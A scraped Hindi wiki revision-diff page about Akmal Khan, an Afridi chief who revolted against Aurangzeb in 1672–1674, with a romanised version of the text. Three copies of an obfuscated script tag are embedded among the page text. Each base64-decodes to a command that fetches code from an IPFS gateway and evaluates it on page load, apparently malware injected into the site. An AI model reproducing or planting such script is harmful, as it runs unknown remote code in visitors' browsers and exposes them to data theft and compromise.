Difference between revisions of "अकमल ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
*अक़मल ख़ान एक अफ़रीदी क़बाइली सरदार था जिसने 1672 ई. में [[मुग़ल]] बादशाह [[औरंगज़ेब]] के विरुद्ध विद्रोह का नेतृत्व किया और अपने को सुल्तान घोषित कर दिया।  
 
*अक़मल ख़ान एक अफ़रीदी क़बाइली सरदार था जिसने 1672 ई. में [[मुग़ल]] बादशाह [[औरंगज़ेब]] के विरुद्ध विद्रोह का नेतृत्व किया और अपने को सुल्तान घोषित कर दिया।  
*उसने अली मस्ज़िद की लड़ाई में मुग़ल सेना को हरा दिया और कुछ समय तक पठानों के पूरे क्षेत्र पर अटक से [[कंधार]] तक अपना राज्य स्थापित कर लिया था।  
+
*उसने अली मस्जिद की लड़ाई में मुग़ल सेना को हरा दिया और कुछ समय तक पठानों के पूरे क्षेत्र पर अटक से [[कंधार]] तक अपना राज्य स्थापित कर लिया था।  
 
*1674 ई. में औरंगज़ेब ख़ुद [[पेशावर]] गया तथा कूटनीति और शस्त्र-बल से उसने अकमल ख़ाँ तथा [[पठान|पठानों]] को हरा दिया।
 
*1674 ई. में औरंगज़ेब ख़ुद [[पेशावर]] गया तथा कूटनीति और शस्त्र-बल से उसने अकमल ख़ाँ तथा [[पठान|पठानों]] को हरा दिया।
  

Revision as of 10:09, 15 January 2011

  • aqamal khan ek afaridi qabaili saradar tha jisane 1672 ee. mean mugal badashah aurangazeb ke viruddh vidroh ka netritv kiya aur apane ko sultan ghoshit kar diya.
  • usane ali masjid ki l daee mean mugal sena ko hara diya aur kuchh samay tak pathanoan ke poore kshetr par atak se kandhar tak apana rajy sthapit kar liya tha.
  • 1674 ee. mean aurangazeb khud peshavar gaya tatha kootaniti aur shastr-bal se usane akamal khaan tatha pathanoan ko hara diya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh